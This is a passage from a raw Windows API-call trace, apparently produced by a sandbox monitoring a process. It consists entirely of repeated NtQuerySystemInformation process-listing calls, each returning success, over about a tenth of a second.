NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, 